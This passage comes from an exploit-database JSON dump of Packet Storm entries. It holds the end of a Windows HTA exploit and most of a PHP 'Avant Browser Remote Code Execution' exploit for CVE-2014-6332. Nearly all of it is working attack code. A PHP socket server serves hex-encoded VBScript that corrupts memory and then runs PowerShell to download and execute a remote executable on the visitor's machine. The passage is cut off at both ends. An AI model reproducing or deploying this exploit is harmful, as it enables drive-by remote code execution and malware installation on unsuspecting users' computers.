\n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x65\\x6e\\x64\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\". \n\"\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x20\\x72\\x75\\x6d\\x28\\x61\\x64\\x64\\x29\\x20\". \n\"\\x0d\\x0a\\x20\\x20\\x20\\x20\\x4f\\x6e\\x20\\x45\\x72\\x72\\x6f\\x72\\x20\\x52\\x65\\x73\\x75\\x6d\\x65\\x20\\x4e\\x65\". \n\"\\x78\\x74\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\". \n\"\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\". \n\"\\x3d\\x30\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3d\\x61\\x64\\x64\\x2b\\x34\\x20\". \n\"\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x31\\x2e\\x36\\x39\\x37\\x35\\x39\\x36\". \n\"\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2d\\x33\\x31\\x33\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x72\\x75\\x6d\\x3d\\x6c\\x65\\x6e\\x62\\x28\\x61\\x61\\x28\\x61\\x31\\x29\\x29\\x20\\x20\\x0d\\x0a\\x20\\x20\". \n\"\\x20\\x20\\x0d\\x0a\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3d\\x30\\x0d\\x0a\\x20\\x20\\x20\\x20\\x72\\x65\\x64\". \n\"\\x69\\x6d\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x0d\\x0a\\x65\\x6e\\x64\". \n\"\\x20\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\\x0d\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x73\\x63\\x72\\x69\\x70\\x74\\x3e\\x0d\". \n\"\\x0a\\x20\\x0d\\x0a\\x3c\\x2f\\x62\\x6f\\x64\\x79\\x3e\\x0d\\x0a\\x3c\\x2f\\x68\\x74\\x6d\\x6c\\x3e\"; \n$msgd=str_replace(\"FILE_DOWNLOAD\",$link,$msgd); \n \nfor (;;) { \nif ($client = @socket_accept($reza)) { \nsocket_write($client, \"HTTP/1.1 200 OK\\r\\n\" . \n\"Content-length: \" . strlen($msgd) . \"\\r\\n\" . \n\"Content-Type: text/html; charset=UTF-8\\r\\n\\r\\n\" . \n$msgd); \nprint \"\\n Target Checked Your Link \\n\"; \n} \nelse usleep(100000); \n} \n \n \n?> \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/133107/mswinhta-exec.txt", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:29", "description": "", "cvss3": {}, "published": "2015-10-21T00:00:00", "type": "packetstorm", "title": "Avant Browser Lite / Ultimate Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-6332"], "modified": "2015-10-21T00:00:00", "id": "PACKETSTORM:134053", "href": "https://packetstormsecurity.com/files/134053/Avant-Browser-Lite-Ultimate-Remote-Code-Execution.html", "sourceData": "`#!/usr/bin/php \n<?php \n########################################################## \n# Author : Ehsan Noreddini \n# E-Mail : me@ehsann.info \n# Social : @prot3ct0r \n# Title : Avant Browser Remote Code Execution \n# Avant Browser is an ultra-fast web browser. Its user-friendly interface brings a new level of clarity and efficiency to your browsing experience, and frequent upgrades have steadily improved its reliability. \n# Version : Lite and Ultimate \n# Release : Stable \n# Build : build 28, 9.30.2015 \n# CVE : CVE2014-6332 \n# Tested on : Windows7 \n# Download : http://www.avantbrowser.com/download.aspx?uil=en-US \n# Website : http://www.avantbrowser.com/ \n########################################################## \n# 1. run php code : php exploit.php \n# 2. get the output address and open it in browser ! \n########################################################## \n# Shot : http://ehsann.info/proof/Avant_Browser_Remote_Code_Execution.png \n# Video : https://www.youtube.com/watch?v=a4TjAOCy-qs \n# Original Code : http://ehsann.info/exploit/3.txt \n########################################################## \n \nprint \"Avant Browser Remote Code Execution Exploit \\r\\n\"; \n$port=80; # Port Address \n$link=\"http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe\"; # Your malicious file \n$socket = socket_create(AF_INET, SOCK_STREAM, 0) or die('Failed to create socket!'); \nsocket_bind($socket, 0,$port); \nsocket_listen($socket); \n# MS14-064 \n$msgd = \"\\x3C\\x68\\x74\\x6D\\x6C\\x3E\\x0D\\x0A\\x3C\\x6D\\x65\\x74\\x61\\x20\\x68\\x74\\x74\\x70\\x2D\\x65\\x71\\x75\\x69\\x76\\x3D\\x22\\x58\\x2D\\x55\\x41\\x2D\\x43\\x6F\\x6D\\x70\\x61\\x74\\x69\\x62\\x6C\\x65\\x22\\x20\\x63\\x6F\\x6E\\x74\\x65\\x6E\\x74\\x3D\\x22\\x49\\x45\\x3D\\x45\\x6D\\x75\\x6C\\x61\\x74\\x65\\x49\\x45\\x38\\x22\\x20\\x3E\\x0D\\x0A\\x3C\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x2F\\x68\\x65\\x61\\x64\\x3E\\x0D\\x0A\\x3C\\x62\\x6F\\x64\\x79\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x73\\x65\\x74\\x20\\x73\\x68\\x65\\x6C\\x6C\\x3D\\x63\\x72\\x65\\x61\\x74\\x65\\x6F\\x62\\x6A\\x65\\x63\\x74\\x28\\x22\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x22\\x29\\x0D\\x0A\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x3D\\x22\\x49\\x6E\\x76\\x6F\\x6B\\x65\\x2D\\x45\\x78\\x70\\x72\\x65\\x73\\x73\\x69\\x6F\\x6E\\x20\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x53\\x79\\x73\\x74\\x65\\x6D\\x2E\\x4E\\x65\\x74\\x2E\\x57\\x65\\x62\\x43\\x6C\\x69\\x65\\x6E\\x74\\x29\\x2E\\x44\\x6F\\x77\\x6E\\x6C\\x6F\\x61\\x64\\x46\\x69\\x6C\\x65\\x28\\x27\\x44\\x4F\\x57\\x4E\\x4C\\x4F\\x41\\x44\\x27\\x2C\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x24\\x28\\x4E\\x65\\x77\\x2D\\x4F\\x62\\x6A\\x65\\x63\\x74\\x20\\x2D\\x63\\x6F\\x6D\\x20\\x53\\x68\\x65\\x6C\\x6C\\x2E\\x41\\x70\\x70\\x6C\\x69\\x63\\x61\\x74\\x69\\x6F\\x6E\\x29\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x28\\x27\\x6C\\x6F\\x61\\x64\\x2E\\x65\\x78\\x65\\x27\\x29\\x3B\\x22\\x0D\\x0A\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x53\\x68\\x65\\x6C\\x6C\\x45\\x78\\x65\\x63\\x75\\x74\\x65\\x20\\x22\\x70\\x6F\\x77\\x65\\x72\\x73\\x68\\x65\\x6C\\x6C\\x2E\\x65\\x78\\x65\\x22\\x2C\\x20\\x22\\x2D\\x43\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x20\\x22\\x20\\x26\\x20\\x63\\x6F\\x6D\\x6D\\x61\\x6E\\x64\\x2C\\x20\\x22\\x22\\x2C\\x20\\x22\\x72\\x75\\x6E\\x61\\x73\\x22\\x2C\\x20\\x30\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x3C\\x2F\\x73\\x63\\x72\\x69\\x70\\x74\\x3E\\x0D\\x0A\\x20\\x0D\\x0A\\x3C\\x53\\x43\\x52\\x49\\x50\\x54\\x20\\x4C\\x41\\x4E\\x47\\x55\\x41\\x47\\x45\\x3D\\x22\\x56\\x42\\x53\\x63\\x72\\x69\\x70\\x74\\x22\\x3E\\x0D\\x0A\\x20\\x20\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x61\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x29\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x30\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x31\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x32\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x33\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x72\\x6E\\x64\\x61\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x6C\\x61\\x73\\x73\\x0D\\x0A\\x64\\x69\\x6D\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x0D\\x0A\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x69\\x6E\\x66\\x6F\\x3D\\x4E\\x61\\x76\\x69\\x67\\x61\\x74\\x6F\\x72\\x2E\\x55\\x73\\x65\\x72\\x41\\x67\\x65\\x6E\\x74\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x57\\x69\\x6E\\x36\\x34\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x69\\x66\\x20\\x28\\x69\\x6E\\x73\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x3E\\x30\\x29\\x20\\x20\\x20\\x74\\x68\\x65\\x6E\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x20\\x3D\\x20\\x43\\x49\\x6E\\x74\\x28\\x4D\\x69\\x64\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x49\\x6E\\x53\\x74\\x72\\x28\\x69\\x6E\\x66\\x6F\\x2C\\x20\\x22\\x4D\\x53\\x49\\x45\\x22\\x29\\x20\\x2B\\x20\\x35\\x2C\\x20\\x32\\x29\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x78\\x69\\x74\\x20\\x20\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x77\\x69\\x6E\\x39\\x78\\x3D\\x30\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x49\\x66\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x32\\x31\\x37\\x36\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x31\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x33\\x32\\x37\\x36\\x37\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x30\\x29\\x26\\x63\\x68\\x72\\x77\\x28\\x30\\x29\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x3C\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x22\\x3C\\x62\\x72\\x3E\\x20\\x49\\x45\\x22\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x64\\x6F\\x63\\x75\\x6D\\x65\\x6E\\x74\\x2E\\x77\\x72\\x69\\x74\\x65\\x28\\x69\\x6E\\x74\\x56\\x65\\x72\\x73\\x69\\x6F\\x6E\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x73\\x68\\x65\\x6C\\x6C\\x63\\x6F\\x64\\x65\\x28\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6C\\x73\\x65\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x42\\x65\\x67\\x69\\x6E\\x49\\x6E\\x69\\x74\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x52\\x61\\x6E\\x64\\x6F\\x6D\\x69\\x7A\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x61\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x61\\x62\\x28\\x35\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x30\\x3D\\x31\\x33\\x2B\\x31\\x37\\x2A\\x72\\x6E\\x64\\x28\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x61\\x33\\x3D\\x37\\x2B\\x33\\x2A\\x72\\x6E\\x64\\x28\\x35\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x64\\x69\\x6D\\x20\\x69\\x0D\\x0A\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x46\\x6F\\x72\\x20\\x69\\x20\\x3D\\x20\\x30\\x20\\x54\\x6F\\x20\\x34\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x49\\x66\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x3D\\x54\\x72\\x75\\x65\\x20\\x54\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x43\\x72\\x65\\x61\\x74\\x65\\x3D\\x54\\x72\\x75\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x46\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x45\\x6E\\x64\\x20\\x49\\x66\\x20\\x0D\\x0A\\x20\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x73\\x75\\x62\\x20\\x74\\x65\\x73\\x74\\x61\\x61\\x28\\x29\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x73\\x75\\x62\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x74\\x65\\x73\\x74\\x61\\x61\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x69\\x3D\\x6E\\x75\\x6C\\x6C\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x29\\x3D\\x69\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x36\\x2E\\x33\\x36\\x35\\x39\\x38\\x37\\x33\\x37\\x34\\x33\\x37\\x38\\x30\\x31\\x45\\x2D\\x33\\x31\\x34\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x3D\\x6D\\x79\\x61\\x72\\x72\\x61\\x79\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x37\\x34\\x30\\x38\\x38\\x35\\x33\\x34\\x37\\x33\\x31\\x33\\x32\\x34\\x45\\x2D\\x33\\x31\\x30\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6D\\x79\\x64\\x61\\x74\\x61\\x3D\\x61\\x61\\x28\\x61\\x31\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x73\\x65\\x74\\x6E\\x6F\\x74\\x73\\x61\\x66\\x65\\x6D\\x6F\\x64\\x65\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x6D\\x79\\x64\\x61\\x74\\x61\\x28\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x38\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x69\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x31\\x36\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x33\\x34\\x29\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x66\\x6F\\x72\\x20\\x6B\\x3D\\x30\\x20\\x74\\x6F\\x20\\x26\\x68\\x36\\x30\\x20\\x73\\x74\\x65\\x70\\x20\\x34\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x69\\x66\\x28\\x6A\\x3D\\x31\\x34\\x29\\x20\\x74\\x68\\x65\\x6E\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x31\\x2B\\x32\\x29\\x28\\x69\\x2B\\x26\\x68\\x31\\x31\\x63\\x2B\\x6B\\x29\\x3D\\x61\\x62\\x28\\x34\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x20\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x30\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x6A\\x3D\\x72\\x75\\x6D\\x28\\x69\\x2B\\x26\\x68\\x31\\x32\\x30\\x2B\\x6B\\x29\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x45\\x78\\x69\\x74\\x20\\x66\\x6F\\x72\\x0D\\x0A\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x65\\x6E\\x64\\x20\\x69\\x66\\x0D\\x0A\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x6E\\x65\\x78\\x74\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x32\\x29\\x3D\\x31\\x2E\\x36\\x39\\x37\\x35\\x39\\x36\\x36\\x33\\x33\\x31\\x36\\x37\\x34\\x37\\x45\\x2D\\x33\\x31\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x75\\x6E\\x6D\\x75\\x6D\\x61\\x61\\x28\\x29\\x20\\x0D\\x0A\\x65\\x6E\\x64\\x20\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x0D\\x0A\\x20\\x0D\\x0A\\x66\\x75\\x6E\\x63\\x74\\x69\\x6F\\x6E\\x20\\x4F\\x76\\x65\\x72\\x28\\x29\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x6E\\x20\\x45\\x72\\x72\\x6F\\x72\\x20\\x52\\x65\\x73\\x75\\x6D\\x65\\x20\\x4E\\x65\\x78\\x74\\x0D\\x0A\\x20\\x20\\x20\\x20\\x64\\x69\\x6D\\x20\\x74\\x79\\x70\\x65\\x31\\x2C\\x74\\x79\\x70\\x65\\x32\\x2C\\x74\\x79\\x70\\x65\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x4F\\x76\\x65\\x72\\x3D\\x46\\x61\\x6C\\x73\\x65\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x30\\x3D\\x61\\x30\\x2B\\x61\\x33\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x31\\x3D\\x61\\x30\\x2B\\x32\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x32\\x3D\\x61\\x30\\x2B\\x26\\x68\\x38\\x30\\x30\\x30\\x30\\x30\\x30\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x20\\x61\\x62\\x28\\x61\\x30\\x29\\x20\\x20\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x72\\x65\\x64\\x69\\x6D\\x20\\x20\\x50\\x72\\x65\\x73\\x65\\x72\\x76\\x65\\x20\\x61\\x61\\x28\\x61\\x32\\x29\\x0D\\x0A\\x20\\x20\\x20\\x0D\\x0A\\x20\\x20\\x20\\x20\\x74\\x79\\x70\\x65\\x31\\x3D\\x31\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x62\\x28\\x30\\x29\\x3D\\x31\\x2E\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x30\\x0D\\x0A\\x20\\x20\\x20\\x20\\x61\\x61\\x28\\x61\\x30\\x29\\x3D\\x31\\x30\\x0D\\x0A\\x20\\x20\\x20\\x2